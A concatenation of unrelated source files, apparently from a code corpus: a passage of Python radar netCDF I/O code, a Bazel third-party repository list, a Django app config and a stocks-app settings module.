                    unique_times_unix_sec[i], TIME_FORMAT_FOR_LOG_MESSAGES)

                warning_string = (
                    'Cannot find file for "{0:s}" at {1:d} metres ASL and '
                    '{2:s}.'
                ).format(
                    field_name_by_pair[j], int(height_by_pair_m_asl[j]),
                    this_time_string
                )

                warnings.warn(warning_string)

    return {
        RADAR_FILE_NAMES_KEY: radar_file_name_matrix,
        UNIQUE_TIMES_KEY: unique_times_unix_sec,
        SPC_DATES_AT_UNIQUE_TIMES_KEY: spc_dates_at_unique_times_unix_sec,
        FIELD_NAME_BY_PAIR_KEY: field_name_by_pair,
        HEIGHT_BY_PAIR_KEY: numpy.round(height_by_pair_m_asl).astype(int)
    }
def read_metadata_from_raw_file(
        netcdf_file_name, data_source, raise_error_if_fails=True):
    """Reads metadata from raw (either MYRORSS or MRMS) file.

    This file should contain one radar field at one height and valid time.

    :param netcdf_file_name: Path to input file.
    :param data_source: Data source (string).
    :param raise_error_if_fails: Boolean flag.  If True and file cannot be read,
        this method will raise an error.  If False and file cannot be read, will
        return None.
    :return: metadata_dict: Dictionary with the following keys.
    metadata_dict['nw_grid_point_lat_deg']: Latitude (deg N) of northwesternmost
        grid point.
    metadata_dict['nw_grid_point_lng_deg']: Longitude (deg E) of
        northwesternmost grid point.
    metadata_dict['lat_spacing_deg']: Spacing (deg N) between meridionally
        adjacent grid points.
    metadata_dict['lng_spacing_deg']: Spacing (deg E) between zonally adjacent
        grid points.
    metadata_dict['num_lat_in_grid']: Number of rows (unique grid-point
        latitudes).
    metadata_dict['num_lng_in_grid']: Number of columns (unique grid-point
        longitudes).
    metadata_dict['height_m_asl']: Radar height (metres above sea level).
    metadata_dict['unix_time_sec']: Valid time.
    metadata_dict['field_name']: Name of radar field in GewitterGefahr format.
    metadata_dict['field_name_orig']: Name of radar field in original (either
        MYRORSS or MRMS) format.
    metadata_dict['sentinel_values']: 1-D numpy array of sentinel values.
    """

    error_checking.assert_file_exists(netcdf_file_name)
    netcdf_dataset = netcdf_io.open_netcdf(
        netcdf_file_name, raise_error_if_fails)
    # open_netcdf returns None on failure when raise_error_if_fails=False.
    if netcdf_dataset is None:
        return None

    # Field name is stored as a global attribute of the netCDF file.
    field_name_orig = str(getattr(netcdf_dataset, FIELD_NAME_COLUMN_ORIG))

    metadata_dict = {
        radar_utils.NW_GRID_POINT_LAT_COLUMN:
            getattr(netcdf_dataset, NW_GRID_POINT_LAT_COLUMN_ORIG),
        radar_utils.NW_GRID_POINT_LNG_COLUMN:
            lng_conversion.convert_lng_positive_in_west(
                getattr(netcdf_dataset, NW_GRID_POINT_LNG_COLUMN_ORIG),
                allow_nan=False),
        radar_utils.LAT_SPACING_COLUMN:
            getattr(netcdf_dataset, LAT_SPACING_COLUMN_ORIG),
        radar_utils.LNG_SPACING_COLUMN:
            getattr(netcdf_dataset, LNG_SPACING_COLUMN_ORIG),
        # NOTE(review): raw dimension sizes are incremented by 1 here --
        # presumably the files store (grid size - 1); confirm against the
        # MYRORSS/MRMS format documentation.
        radar_utils.NUM_LAT_COLUMN:
            netcdf_dataset.dimensions[NUM_LAT_COLUMN_ORIG].size + 1,
        radar_utils.NUM_LNG_COLUMN:
            netcdf_dataset.dimensions[NUM_LNG_COLUMN_ORIG].size + 1,
        radar_utils.HEIGHT_COLUMN:
            getattr(netcdf_dataset, HEIGHT_COLUMN_ORIG),
        radar_utils.UNIX_TIME_COLUMN:
            getattr(netcdf_dataset, UNIX_TIME_COLUMN_ORIG),
        FIELD_NAME_COLUMN_ORIG: field_name_orig,
        radar_utils.FIELD_NAME_COLUMN: radar_utils.field_name_orig_to_new(
            field_name_orig=field_name_orig, data_source_name=data_source)
    }

    latitude_spacing_deg = metadata_dict[radar_utils.LAT_SPACING_COLUMN]
    longitude_spacing_deg = metadata_dict[radar_utils.LNG_SPACING_COLUMN]

    # TODO(thunderhoser): The following "if" condition is a hack.  The purpose
    # is to change grid corners only for actual MYRORSS data, not GridRad data
    # in MYRORSS format.
    if latitude_spacing_deg < 0.011 and longitude_spacing_deg < 0.011:
        # Snap the NW corner onto the grid (floor the latitude, ceiling the
        # longitude) so coordinates are exact multiples of the spacing.
        metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] = (
            rounder.floor_to_nearest(
                metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
                metadata_dict[radar_utils.LAT_SPACING_COLUMN]))
        metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN] = (
            rounder.ceiling_to_nearest(
                metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
                metadata_dict[radar_utils.LNG_SPACING_COLUMN]))

    # Sentinel (missing-data) values are stored as global attributes.
    sentinel_values = []
    for this_column in SENTINEL_VALUE_COLUMNS_ORIG:
        sentinel_values.append(getattr(netcdf_dataset, this_column))

    metadata_dict.update({
        radar_utils.SENTINEL_VALUE_COLUMN: numpy.array(sentinel_values)})
    netcdf_dataset.close()
    return metadata_dict
def read_data_from_sparse_grid_file(
        netcdf_file_name, field_name_orig, data_source, sentinel_values,
        raise_error_if_fails=True):
    """Reads sparse radar grid from raw (either MYRORSS or MRMS) file.

    This file should contain one radar field at one height and valid time.

    :param netcdf_file_name: Path to input file.
    :param field_name_orig: Name of radar field in original (either MYRORSS or
        MRMS) format.
    :param data_source: Data source (string).
    :param sentinel_values: 1-D numpy array of sentinel values.
    :param raise_error_if_fails: Boolean flag.  If True and file cannot be read,
        this method will raise an error.  If False and file cannot be read, will
        return None.
    :return: sparse_grid_table: pandas DataFrame with the following columns.
        Each row corresponds to one grid point.
    sparse_grid_table.grid_row: Row index.
    sparse_grid_table.grid_column: Column index.
    sparse_grid_table.<field_name>: Radar measurement (column name is produced
        by _field_name_orig_to_new).
    sparse_grid_table.num_grid_cells: Number of consecutive grid points with the
        same radar measurement.  Counting is row-major (to the right along the
        row, then down to the next column if necessary).
    """

    error_checking.assert_file_exists(netcdf_file_name)
    error_checking.assert_is_numpy_array_without_nan(sentinel_values)
    error_checking.assert_is_numpy_array(sentinel_values, num_dimensions=1)

    dataset_object = netcdf_io.open_netcdf(
        netcdf_file_name, raise_error_if_fails)
    if dataset_object is None:
        return None

    field_name = radar_utils.field_name_orig_to_new(
        field_name_orig=field_name_orig, data_source_name=data_source)

    # An empty file yields empty (but correctly typed) columns.
    if len(dataset_object.variables[GRID_ROW_COLUMN_ORIG]) == 0:
        column_dict = {
            GRID_ROW_COLUMN: numpy.array([], dtype=int),
            GRID_COLUMN_COLUMN: numpy.array([], dtype=int),
            NUM_GRID_CELL_COLUMN: numpy.array([], dtype=int),
            field_name: numpy.array([])}
    else:
        # Materialize all variable data ([:]) before closing the dataset.
        column_dict = {
            GRID_ROW_COLUMN: dataset_object.variables[GRID_ROW_COLUMN_ORIG][:],
            GRID_COLUMN_COLUMN:
                dataset_object.variables[GRID_COLUMN_COLUMN_ORIG][:],
            NUM_GRID_CELL_COLUMN:
                dataset_object.variables[NUM_GRID_CELL_COLUMN_ORIG][:],
            field_name: dataset_object.variables[field_name_orig][:]}

    dataset_object.close()

    return _remove_sentinels_from_sparse_grid(
        pandas.DataFrame.from_dict(column_dict), field_name=field_name,
        sentinel_values=sentinel_values)
def read_data_from_full_grid_file(
        netcdf_file_name, metadata_dict, raise_error_if_fails=True):
    """Reads full radar grid from raw (either MYRORSS or MRMS) file.

    This file should contain one radar field at one height and valid time.

    :param netcdf_file_name: Path to input file.
    :param metadata_dict: Dictionary created by `read_metadata_from_raw_file`.
    :param raise_error_if_fails: Boolean flag.  If True and file cannot be read,
        this method will raise an error.  If False and file cannot be read, will
        return None for all output vars.
    :return: field_matrix: M-by-N numpy array with radar field.  Latitude
        increases while moving up each column, and longitude increases while
        moving right along each row.
    :return: grid_point_latitudes_deg: length-M numpy array of grid-point
        latitudes (deg N).  This array is monotonically decreasing.
    :return: grid_point_longitudes_deg: length-N numpy array of grid-point
        longitudes (deg E).  This array is monotonically increasing.
    """

    error_checking.assert_file_exists(netcdf_file_name)
    netcdf_dataset = netcdf_io.open_netcdf(
        netcdf_file_name, raise_error_if_fails)
    if netcdf_dataset is None:
        return None, None, None

    # BUG FIX: materialize the data ([:]) BEFORE closing the dataset.  The
    # original kept a lazy netCDF4 Variable and closed the file first, so any
    # later access to the values raised a RuntimeError.  This also matches
    # `read_data_from_sparse_grid_file`, which reads with [:] pre-close.
    field_matrix = netcdf_dataset.variables[
        metadata_dict[FIELD_NAME_COLUMN_ORIG]][:]
    netcdf_dataset.close()

    min_latitude_deg = metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] - (
        metadata_dict[radar_utils.LAT_SPACING_COLUMN] * (
            metadata_dict[radar_utils.NUM_LAT_COLUMN] - 1))

    grid_point_latitudes_deg, grid_point_longitudes_deg = (
        grids.get_latlng_grid_points(
            min_latitude_deg=min_latitude_deg,
            min_longitude_deg=
            metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
            lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
            lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN],
            num_rows=metadata_dict[radar_utils.NUM_LAT_COLUMN],
            num_columns=metadata_dict[radar_utils.NUM_LNG_COLUMN]))

    # Replace sentinel values, then flip rows so that the row order matches
    # the reversed (monotonically decreasing) latitude array.
    field_matrix = _remove_sentinels_from_full_grid(
        field_matrix, metadata_dict[radar_utils.SENTINEL_VALUE_COLUMN])

    return (numpy.flipud(field_matrix), grid_point_latitudes_deg[::-1],
            grid_point_longitudes_deg)
def write_field_to_myrorss_file(
        field_matrix, netcdf_file_name, field_name, metadata_dict,
        height_m_asl=None):
    """Writes field to MYRORSS-formatted file.

    M = number of rows (unique grid-point latitudes)
    N = number of columns (unique grid-point longitudes)

    :param field_matrix: M-by-N numpy array with one radar variable at one time.
        Latitude should increase down each column, and longitude should increase
        to the right along each row.
    :param netcdf_file_name: Path to output file.
    :param field_name: Name of radar field in GewitterGefahr format.
    :param metadata_dict: Dictionary created by either
        `gridrad_io.read_metadata_from_full_grid_file` or
        `read_metadata_from_raw_file`.
    :param height_m_asl: Height of radar field (metres above sea level).
    """

    # Resolve the (field, height) pair; only reflectivity takes an explicit
    # height argument.
    if field_name == radar_utils.REFL_NAME:
        field_to_heights_dict_m_asl = (
            myrorss_and_mrms_utils.fields_and_refl_heights_to_dict(
                field_names=[field_name],
                data_source=radar_utils.MYRORSS_SOURCE_ID,
                refl_heights_m_asl=numpy.array([height_m_asl])))
    else:
        field_to_heights_dict_m_asl = (
            myrorss_and_mrms_utils.fields_and_refl_heights_to_dict(
                field_names=[field_name],
                data_source=radar_utils.MYRORSS_SOURCE_ID))

    field_name = list(field_to_heights_dict_m_asl.keys())[0]
    radar_height_m_asl = field_to_heights_dict_m_asl[field_name][0]

    # Echo tops are converted from metres to km (METRES_TO_KM factor).
    if field_name in radar_utils.ECHO_TOP_NAMES:
        field_matrix = METRES_TO_KM * field_matrix
    field_name_myrorss = radar_utils.field_name_new_to_orig(
        field_name=field_name, data_source_name=radar_utils.MYRORSS_SOURCE_ID)

    file_system_utils.mkdir_recursive_if_necessary(file_name=netcdf_file_name)
    netcdf_dataset = Dataset(
        netcdf_file_name, 'w', format='NETCDF3_64BIT_OFFSET')

    # Global attributes expected by MYRORSS readers.
    netcdf_dataset.setncattr(
        FIELD_NAME_COLUMN_ORIG, field_name_myrorss)
    netcdf_dataset.setncattr('DataType', 'SparseLatLonGrid')
    netcdf_dataset.setncattr(
        NW_GRID_POINT_LAT_COLUMN_ORIG, rounder.round_to_nearest(
            metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
            LATLNG_MULTIPLE_DEG))
    netcdf_dataset.setncattr(
        NW_GRID_POINT_LNG_COLUMN_ORIG, rounder.round_to_nearest(
            metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
            LATLNG_MULTIPLE_DEG))

    # BUG FIX: `numpy.float` was deprecated in numpy 1.20 and removed in
    # 1.24, so the original calls raised AttributeError on modern numpy.
    # The builtin `float` is exactly what the alias resolved to.
    netcdf_dataset.setncattr(
        HEIGHT_COLUMN_ORIG,
        METRES_TO_KM * float(radar_height_m_asl))
    netcdf_dataset.setncattr(
        UNIX_TIME_COLUMN_ORIG,
        numpy.int32(metadata_dict[radar_utils.UNIX_TIME_COLUMN]))
    netcdf_dataset.setncattr('FractionalTime', 0.)
    netcdf_dataset.setncattr('attributes', ' ColorMap SubType Unit')
    netcdf_dataset.setncattr('ColorMap-unit', 'dimensionless')
    netcdf_dataset.setncattr('ColorMap-value', '')
    netcdf_dataset.setncattr('SubType-unit', 'dimensionless')
    netcdf_dataset.setncattr('SubType-value', float(radar_height_m_asl))
    netcdf_dataset.setncattr('Unit-unit', 'dimensionless')
    netcdf_dataset.setncattr('Unit-value', 'dimensionless')
    netcdf_dataset.setncattr(
        LAT_SPACING_COLUMN_ORIG, rounder.round_to_nearest(
            metadata_dict[radar_utils.LAT_SPACING_COLUMN],
            LATLNG_MULTIPLE_DEG))
    netcdf_dataset.setncattr(
        LNG_SPACING_COLUMN_ORIG, rounder.round_to_nearest(
            metadata_dict[radar_utils.LNG_SPACING_COLUMN],
            LATLNG_MULTIPLE_DEG))
    netcdf_dataset.setncattr(
        SENTINEL_VALUE_COLUMNS_ORIG[0], numpy.double(-99000.))
    netcdf_dataset.setncattr(
        SENTINEL_VALUE_COLUMNS_ORIG[1], numpy.double(-99001.))

    min_latitude_deg = metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] - (
        metadata_dict[radar_utils.LAT_SPACING_COLUMN] *
        (metadata_dict[radar_utils.NUM_LAT_COLUMN] - 1))
    unique_grid_point_lats_deg, unique_grid_point_lngs_deg = (
        grids.get_latlng_grid_points(
            min_latitude_deg=min_latitude_deg,
            min_longitude_deg=
            metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
            lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
            lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN],
            num_rows=metadata_dict[radar_utils.NUM_LAT_COLUMN],
            num_columns=metadata_dict[radar_utils.NUM_LNG_COLUMN]))

    num_grid_rows = len(unique_grid_point_lats_deg)
    num_grid_columns = len(unique_grid_point_lngs_deg)
    field_vector = numpy.reshape(field_matrix, num_grid_rows * num_grid_columns)

    grid_point_lat_matrix, grid_point_lng_matrix = (
        grids.latlng_vectors_to_matrices(
            unique_grid_point_lats_deg, unique_grid_point_lngs_deg))
    grid_point_lat_vector = numpy.reshape(
        grid_point_lat_matrix, num_grid_rows * num_grid_columns)
    grid_point_lng_vector = numpy.reshape(
        grid_point_lng_matrix, num_grid_rows * num_grid_columns)

    # Sparse representation: only non-NaN points are written.
    real_value_indices = numpy.where(numpy.invert(numpy.isnan(field_vector)))[0]

    netcdf_dataset.createDimension(
        NUM_LAT_COLUMN_ORIG, num_grid_rows - 1)
    netcdf_dataset.createDimension(
        NUM_LNG_COLUMN_ORIG, num_grid_columns - 1)
    netcdf_dataset.createDimension(
        NUM_PIXELS_COLUMN_ORIG, len(real_value_indices))

    row_index_vector, column_index_vector = radar_utils.latlng_to_rowcol(
        grid_point_lat_vector, grid_point_lng_vector,
        nw_grid_point_lat_deg=
        metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
        nw_grid_point_lng_deg=
        metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
        lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
        lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN])

    netcdf_dataset.createVariable(
        field_name_myrorss, numpy.single, (NUM_PIXELS_COLUMN_ORIG,))
    netcdf_dataset.createVariable(
        GRID_ROW_COLUMN_ORIG, numpy.int16, (NUM_PIXELS_COLUMN_ORIG,))
    netcdf_dataset.createVariable(
        GRID_COLUMN_COLUMN_ORIG, numpy.int16, (NUM_PIXELS_COLUMN_ORIG,))
    netcdf_dataset.createVariable(
        NUM_GRID_CELL_COLUMN_ORIG, numpy.int32, (NUM_PIXELS_COLUMN_ORIG,))

    netcdf_dataset.variables[field_name_myrorss].setncattr(
        'BackgroundValue', numpy.int32(-99900))
    netcdf_dataset.variables[field_name_myrorss].setncattr(
        'units', 'dimensionless')
    netcdf_dataset.variables[field_name_myrorss].setncattr(
        'NumValidRuns', numpy.int32(len(real_value_indices)))

    netcdf_dataset.variables[field_name_myrorss][:] = field_vector[
        real_value_indices]
    netcdf_dataset.variables[GRID_ROW_COLUMN_ORIG][:] = (
        row_index_vector[real_value_indices])
    netcdf_dataset.variables[GRID_COLUMN_COLUMN_ORIG][:] = (
        column_index_vector[real_value_indices])
    # Every run has length 1 (one value per sparse entry).
    netcdf_dataset.variables[NUM_GRID_CELL_COLUMN_ORIG][:] = (
        numpy.full(len(real_value_indices), 1, dtype=int))

    netcdf_dataset.close()
| 38,214 | 13,665 |
from setup.Base import Base
from setup.Docker import Docker
from setup.SystemD import SystemD
| 94 | 25 |
# Copyright 2021 Cory Paik. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
""" Research repositories """
load("//tools:maybe_http.bzl", "http_archive")
def _clean_dep(x):
    """Returns the absolute label string for `x`, resolved relative to this repository."""
    return str(Label(x))
def _py_repositories():
    """Fetches Python third-party source archives built with custom BUILD files."""
    http_archive(
        name = "pytoolz_toolz",
        build_file = _clean_dep("//third_party:toolz.BUILD"),
        sha256 = "5c6ebde36ec2ceb9d6b3946105ba10b25237a67daee4eb80d62c508b9c4c2f55",
        strip_prefix = "toolz-0.11.1",
        urls = [
            "https://github.com/pytoolz/toolz/archive/0.11.1.tar.gz",
        ],
    )
    http_archive(
        name = "pytoolz_cytoolz",
        build_file = _clean_dep("//third_party:cytoolz.BUILD"),
        sha256 = "dba4a9d95e49f4f3cb5c41937f55dffe600aca5a7e640e3c2a56d9224923d7bb",
        strip_prefix = "cytoolz-0.11.0",
        urls = [
            "https://github.com/pytoolz/cytoolz/archive/0.11.0.tar.gz",
        ],
    )
    # NOTE: applies a local patch (//third_party:tensor_annotations.patch).
    http_archive(
        name = "dm_tensor_annotations",
        build_file = _clean_dep("//third_party:tensor_annotations.BUILD"),
        patch_args = ["-p1"],
        patches = [Label("//third_party:tensor_annotations.patch")],
        sha256 = "d0a932efa70b1465860b14b5bbaf9b8eae8666133b28e74eaebdec9f30053f39",
        strip_prefix = "tensor_annotations-b24a6213d20e806d9f06f4af9e0c0d1707b26d3e",
        urls = [
            "https://github.com/deepmind/tensor_annotations/archive/b24a6213d20e806d9f06f4af9e0c0d1707b26d3e.tar.gz",
        ],
    )
    http_archive(
        name = "python_typeshed",
        build_file = _clean_dep("//third_party:typeshed.BUILD"),
        sha256 = "804110a0f0224f9f59d1854e6e9dd20157a899fcf1cd61f2376f29e2663a6c3e",
        strip_prefix = "typeshed-53087be4eb935e5db24e9dddad3567ecaf1909a7",
        urls = [
            "https://github.com/python/typeshed/archive/53087be4eb935e5db24e9dddad3567ecaf1909a7.tar.gz",
        ],
    )
    http_archive(
        name = "dm_rlax",
        build_file = _clean_dep("//third_party:rlax.BUILD"),
        sha256 = "d2283be962dc697882ff371813c64220a2c34a5538ca017d5bf699848426be3f",
        strip_prefix = "rlax-4e8aeed362d65ebb80bac162f09994c322c966a1",
        urls = ["https://github.com/deepmind/rlax/archive/4e8aeed362d65ebb80bac162f09994c322c966a1.tar.gz"],
    )
    http_archive(
        name = "dm_optax",
        build_file = _clean_dep("//third_party:optax.BUILD"),
        sha256 = "39a48c13be5e8259656dc7ed613dceaea9b205e1927b8b87db3c0e8181f18739",
        strip_prefix = "optax-0.0.9",
        urls = ["https://github.com/deepmind/optax/archive/v0.0.9.tar.gz"],
    )
    http_archive(
        name = "dm_chex",
        build_file = _clean_dep("//third_party:chex.BUILD"),
        sha256 = "d6a2410d77879e0f768cb0796f3156c78627a28ef6362ac725582b77af32ca64",
        strip_prefix = "chex-fb7924766dec32cc9201149b66908545b44d03a9",
        urls = ["https://github.com/deepmind/chex/archive/fb7924766dec32cc9201149b66908545b44d03a9.tar.gz"],
    )
    http_archive(
        name = "com_google_flax",
        build_file = _clean_dep("//third_party:flax.BUILD"),
        sha256 = "b0da699b317fe028f6b0ae94174ec0a17ca376a79ca0a48e5b106ee7070d849c",
        strip_prefix = "flax-0.3.5",
        urls = ["https://github.com/google/flax/archive/v0.3.5.tar.gz"],
    )
    http_archive(
        name = "dm_tree",
        build_file = _clean_dep("//third_party:tree.BUILD"),
        sha256 = "542449862e600e50663128a31cd4e262880f423f8bc66a64748f9bb20762cfbe",
        strip_prefix = "tree-42e87fda83278e2eb32bb55225e1d1511e77c10c",
        urls = ["https://github.com/deepmind/tree/archive/42e87fda83278e2eb32bb55225e1d1511e77c10c.tar.gz"],
    )
    http_archive(
        name = "dm_fancyflags",
        build_file = _clean_dep("//third_party:fancyflags.BUILD"),
        sha256 = "19805c12d7512c9e2806c0a6fea352381b4718e25d94d94960e8f3e61e3e4ab2",
        strip_prefix = "fancyflags-2e13d9818fb41dbb4476c4ebbcfe5f5a35643ef0",
        url = "https://github.com/deepmind/fancyflags/archive/2e13d9818fb41dbb4476c4ebbcfe5f5a35643ef0.tar.gz",
    )
    # NOTE: applies a local patch (//third_party/py:transformers.patch).
    http_archive(
        name = "hf_transformers",
        build_file = _clean_dep("//third_party/py:transformers.BUILD"),
        patch_args = ["-p1"],
        patches = [_clean_dep("//third_party/py:transformers.patch")],
        sha256 = "30d9e30583e47680fd7b9809138c4cd83166fa0770f0113a1e06c3f65b848b4d",
        strip_prefix = "transformers-4.10.3",
        urls = [
            "https://github.com/huggingface/transformers/archive/v4.10.3.tar.gz",
        ],
    )
def _coda_repositories():
    """Fetches source archives used only by the coda targets."""
    http_archive(
        name = "com_github_openai_clip",
        build_file = _clean_dep("//third_party:clip.BUILD"),
        sha256 = "8949674a42169c92bd1b280b895a8ecdd7e3fe922878f0d8ea8521e09b9e5141",
        strip_prefix = "CLIP-e184f608c5d5e58165682f7c332c3a8b4c1545f2",
        urls = ["https://github.com/openai/CLIP/archive/e184f608c5d5e58165682f7c332c3a8b4c1545f2.tar.gz"],
    )
    http_archive(
        name = "com_github_willwhitney_reprieve",
        build_file = _clean_dep("//third_party:reprieve.BUILD"),
        sha256 = "5d8e3ae90582a82f5e1f9dc65b007e9556048c2c728e85c8c4d80fa82258794a",
        strip_prefix = "reprieve-004e09a37e3c595c450ab05342cd779fa28be462",
        urls = ["https://github.com/willwhitney/reprieve/archive/004e09a37e3c595c450ab05342cd779fa28be462.tar.gz"],
    )
def research_repositories():
    """ Research repositories """

    # Override tensorflow @rules_python version. As of 2021-09-21, the only
    # target for which tensorflow uses @rules_python is:
    #   @org_tensorflow//tensorflow/platform/python/platform:platform
    # This uses @rules_python//python/runfiles, which still exists in v0.4.0.
    http_archive(
        name = "rules_python",
        sha256 = "954aa89b491be4a083304a2cb838019c8b8c3720a7abb9c4cb81ac7a24230cea",
        urls = [
            "https://mirror.bazel.build/github.com/bazelbuild/rules_python/releases/download/0.4.0/rules_python-0.4.0.tar.gz",
            "https://github.com/bazelbuild/rules_python/releases/download/0.4.0/rules_python-0.4.0.tar.gz",
        ],
    )

    ############################################################################
    # JAX & TensorFlow
    http_archive(
        name = "org_tensorflow",
        patch_args = ["-p1"],
        patches = [
            "@com_google_jax//third_party:tensorflow.patch",
            Label("//third_party:tensorflow-sqlite.patch"),
            Label("//third_party:tensorflow-pyconfig.patch"),
        ],
        sha256 = "6b14b66a74728736359afcb491820fa3e713ea4a74bff0defe920f3453a3a0f0",
        strip_prefix = "tensorflow-b5b1ff47ad250c3e38dcadef5f6bc414b0a533ee",
        urls = [
            "https://github.com/tensorflow/tensorflow/archive/b5b1ff47ad250c3e38dcadef5f6bc414b0a533ee.tar.gz",
        ],
    )
    # NOTE: pinned to a fork (corypaik/jax), not upstream google/jax.
    http_archive(
        name = "com_google_jax",
        sha256 = "a2f6e35e0d1b5d2bed88e815d27730338072601003fce93e6c49442afa3d8d96",
        strip_prefix = "jax-c3bacb49489aac6eb565611426022b3dd2a430fa",
        urls = [
            "https://github.com/corypaik/jax/archive/c3bacb49489aac6eb565611426022b3dd2a430fa.tar.gz",
        ],
    )

    ############################################################################
    http_archive(
        name = "bazel_gazelle",
        sha256 = "62ca106be173579c0a167deb23358fdfe71ffa1e4cfdddf5582af26520f1c66f",
        urls = [
            "https://mirror.bazel.build/github.com/bazelbuild/bazel-gazelle/releases/download/v0.23.0/bazel-gazelle-v0.23.0.tar.gz",
            "https://github.com/bazelbuild/bazel-gazelle/releases/download/v0.23.0/bazel-gazelle-v0.23.0.tar.gz",
        ],
    )
    http_archive(
        name = "com_github_bazelbuild_buildtools",
        sha256 = "b8b69615e8d9ade79f3612311b8d0c4dfe01017420c90eed11db15e9e7c9ff3c",
        strip_prefix = "buildtools-4.2.1",
        url = "https://github.com/bazelbuild/buildtools/archive/4.2.1.tar.gz",
    )

    # we rely on dbx_build_tools for the inbuild python interpreter deps.
    # NOTE(review): `patch_args` is set without any `patches`; likely a
    # leftover from a removed patch -- harmless but could be dropped.
    http_archive(
        name = "dbx_build_tools",
        patch_args = ["-p1"],
        sha256 = "151b77cf5d1b06884bc2da350322e33ef5289237622196467988894c57616a0c",
        strip_prefix = "dbx_build_tools-a5ae53031f11d9114cdbc40da8a84b5d28af58f7",
        urls = ["https://github.com/dropbox/dbx_build_tools/archive/a5ae53031f11d9114cdbc40da8a84b5d28af58f7.tar.gz"],
    )
    # zstd is built from source via `make zstd` at fetch time (patch_cmds).
    http_archive(
        name = "facebook_zstd",
        build_file_content = """exports_files(["zstd"])""",
        patch_cmds = ["make zstd"],
        sha256 = "5194fbfa781fcf45b98c5e849651aa7b3b0a008c6b72d4a0db760f3002291e94",
        strip_prefix = "zstd-1.5.0",
        urls = ["https://github.com/facebook/zstd/releases/download/v1.5.0/zstd-1.5.0.tar.gz"],
    )
    http_archive(
        name = "io_bazel_stardoc",
        sha256 = "cd3d1e483eddf9f73db2bd466f329e1d10d65492272820eda57540767c902fe2",
        strip_prefix = "stardoc-0.5.0",
        urls = ["https://github.com/bazelbuild/stardoc/archive/0.5.0.tar.gz"],
    )

    # Overwrite @dbx_build_tools version of cpython3.8. Note that we use the
    # same version, just with a different BUILD file. We could (and used to)
    # just use a patch, but it becomes frustrating to make fixes and we'd like
    # to avoid another having yet another submodule.
    http_archive(
        name = "org_python_cpython_38",
        build_file = _clean_dep("//third_party/cpython:python38.BUILD"),
        sha256 = "75894117f6db7051c1b34f37410168844bbb357c139a8a10a352e9bf8be594e8",
        strip_prefix = "Python-3.8.1",
        urls = ["https://www.python.org/ftp/python/3.8.1/Python-3.8.1.tar.xz"],
    )

    _py_repositories()

    # for specific projects
    _coda_repositories()
| 10,325 | 4,862 |
from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
class DiveLogConfig(AppConfig):
    """Django application configuration for the `dive_log` app."""

    # Dotted Python path of the application.
    name = 'dive_log'
    # Human-readable name; wrapped in a lazy translation so it renders in
    # the active locale.  ("Dyklog" appears to be Swedish for "dive log".)
    verbose_name = _(u'Dyklog')
import json
import logging
import sys
from decouple import config
# general
ENVIRONMENT: str = config("ENVIRONMENT", "docker")
API_VERSION: str = config("API_VERSION", "/api")
PROJECT_NAME: str = config("PROJECT_NAME", "Stocks")
BACKEND_CORS_ORIGINS: str = config("BACKEND_CORS_ORIGINS", "*")
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"

# logging
# Field widths used to build a fixed-width, column-aligned log format.
MILLISECONDS_LENGTH = 3
MODULE_NAME_LENGTH = 20
LINE_NUMBER_LENGTH = 5
LOGGING_LEVEL_NAME_LENGTH = 8
LOG_FORMAT = (
    f"[%(asctime)s"
    f".%(msecs){MILLISECONDS_LENGTH}d] "
    f"[%(module){MODULE_NAME_LENGTH}s] "
    f"[%(lineno){LINE_NUMBER_LENGTH}d] "
    f"[%(levelname){LOGGING_LEVEL_NAME_LENGTH}s]: "
    f"%(message)s"
)
# force=True replaces any handlers installed by libraries imported earlier.
logging.basicConfig(
    datefmt=DATETIME_FORMAT,
    format=LOG_FORMAT,
    level=logging.DEBUG,
    stream=sys.stdout,
    force=True,
)

# time periods
HALF_AN_HOUR = 1800  # seconds

# database
DATABASE_PASSWORD: str = config("DATABASE_PASSWORD", "gibberish")
# Inside docker-compose the database is reachable by service name; on a
# developer machine it is assumed to run locally.
DATABASE_HOST: str = config(
    "DATABASE_HOST", "database" if ENVIRONMENT == "docker" else "127.0.0.1"
)
DATABASE_PORT: int = config("DATABASE_PORT", 5005, cast=int)
# NOTE(review): typed/cast as int -- looks like a numeric database index
# (Redis-style) rather than a database *name*; confirm with the consumer.
DATABASE_NAME: int = config("DATABASE_NAME", 0, cast=int)
TIME_TO_LIVE_IN_SECONDS: int = config(
    "TIME_TO_LIVE_IN_SECONDS", HALF_AN_HOUR, cast=int
)

# sockets
BINANCE_WEB_SOCKET_URL: str = config(
    "BINANCE_WEB_SOCKET_URL",
    "wss://stream.binance.com:9443/stream?streams=!miniTicker@arr",
)
SOCKET_MESSAGE_LENGTH: int = config("SOCKET_MESSAGE_LENGTH", 4096, cast=int)
SOCKET_DISCONNECT_MESSAGE: str = config(
    "SOCKET_DISCONNECT_MESSAGE", "DISCONNECTED!"
)
ENCODING_FORMAT: str = "utf-8"

